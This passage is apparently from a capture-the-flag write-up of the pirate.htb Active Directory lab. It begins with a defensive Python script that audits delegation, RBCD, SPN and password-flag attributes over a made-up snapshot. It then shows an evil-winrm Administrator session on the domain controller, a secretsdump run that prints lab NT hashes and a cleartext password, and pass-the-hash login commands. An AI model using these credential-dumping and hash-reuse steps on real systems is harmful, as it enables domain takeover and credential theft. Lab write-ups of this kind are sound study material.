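Every directory weakness this chain relied on (PASSWD_NOTREQD on MS01$, constrained delegation with protocol transition on a.white_adm, the RBCD entry written on WEB01$, and the HTTP/WEB01.pirate.htb SPN now sitting on DC01) shows up in plain LDAP attributes and can be caught by a periodic audit. The following is an added example, not part of the original page or of nxc or bloodyAD: Python audit logic over a constructed directory snapshot modelled on pirate.htb after the SPN move. Attribute names and userAccountControl bit values are the real AD ones; the records and the check names are my own.

```python
"""Audit AD account attributes for the delegation and password weaknesses used above.

Added example, not from the original writeup. SNAPSHOT is a constructed directory
dump modelled on pirate.htb after the SPN relocation; attribute names and the
userAccountControl bit values are the real ones, the records are made up.
"""
UF_PASSWD_NOTREQD = 0x0020
UF_SERVER_TRUST_ACCOUNT = 0x2000                # domain controllers
UF_TRUSTED_FOR_DELEGATION = 0x80000             # unconstrained delegation
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # protocol transition (S4U2Self for any user)


def spn_host(spn: str) -> str:
    """'HTTP/WEB01.pirate.htb:8080' -> 'web01.pirate.htb'."""
    return spn.split("/", 1)[1].split(":", 1)[0].lower()


def audit(objects):
    findings = []  # (sAMAccountName, check, detail)
    for o in objects:
        name = o["sAMAccountName"]
        uac = o.get("userAccountControl", 0)
        if uac & UF_PASSWD_NOTREQD:
            findings.append((name, "PASSWD_NOTREQD", "password policy not enforced; trivial password possible"))
        if uac & UF_TRUSTED_FOR_DELEGATION and not uac & UF_SERVER_TRUST_ACCOUNT:
            # Unconstrained delegation is expected on DCs, a finding anywhere else.
            findings.append((name, "UNCONSTRAINED_DELEGATION", "TGTs of connecting users are cached here"))
        targets = o.get("msDS-AllowedToDelegateTo", [])
        if targets:
            kind = ("CONSTRAINED_WITH_PROTOCOL_TRANSITION"
                    if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION else "CONSTRAINED")
            findings.append((name, kind, ", ".join(targets)))
        if o.get("msDS-AllowedToActOnBehalfOfOtherIdentity"):
            # RBCD lives on the *target* object; any value means some principal can S4U2Proxy to it.
            findings.append((name, "RBCD_CONFIGURED", "msDS-AllowedToActOnBehalfOfOtherIdentity is set"))
        host = o.get("dNSHostName", "").lower()
        for spn in o.get("servicePrincipalName", []):
            # An SPN whose host is not this computer means tickets for that host are
            # encrypted with this account's key (the HTTP/WEB01 -> DC01 move above).
            if "/" in spn and host and spn_host(spn) not in (host, host.split(".")[0]):
                findings.append((name, "SPN_HOST_MISMATCH", spn))
    return findings


# Constructed snapshot (not real data): what pirate.htb looks like after the SPN move.
SNAPSHOT = [
    {"sAMAccountName": "a.white_adm", "userAccountControl": 0x200 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["http/WEB01.pirate.htb", "HTTP/WEB01"]},
    {"sAMAccountName": "MS01$", "userAccountControl": 0x1000 | UF_PASSWD_NOTREQD,
     "dNSHostName": "ms01.pirate.htb", "servicePrincipalName": ["HOST/MS01.pirate.htb"]},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x1000, "dNSHostName": "web01.pirate.htb",
     "servicePrincipalName": ["HOST/WEB01.pirate.htb"],
     "msDS-AllowedToActOnBehalfOfOtherIdentity": b"\x01\x00\x04\x80"},  # placeholder SD bytes
    {"sAMAccountName": "DC01$", "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "dNSHostName": "dc01.pirate.htb",
     "servicePrincipalName": ["HOST/DC01.pirate.htb", "ldap/DC01.pirate.htb", "HTTP/WEB01.pirate.htb"]},
]


if __name__ == "__main__":
    for name, check, detail in audit(SNAPSHOT):
        print(f"{name:12} {check:38} {detail}")
```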
$ evil-winrm -i dc01.pirate.htb -r PIRATE.HTB -u Administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
pirate\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter vEthernet (Switch01):
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::d976:c606:587e:f1e1%8
IPv4 Address. . . . . . . . . . . : 192.168.100.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.7.107
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/*.txt
- We can secretsdump again for the hash and password
$ secretsdump.py -k -no-pass -target-ip $IP PIRATE.HTB/Administrator@dc01.pirate.htb
Impacket v0.14.0.dev0+20251117.163331.7bd0d5ab - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xaf025c301b1be34c7df7d48a75318dd6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:598295e78bd72d66f837997baf715171:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
*snip*
[*] DefaultPassword
PIRATE\Administrator:gODNiUG69Mz77SIZ
- Alternate connections
$ evil-winrm -i $IP -u Administrator -p 'gODNiUG69Mz77SIZ'
$ evil-winrm -i $IP -u Administrator -H 598295e78bd72d66f837997baf715171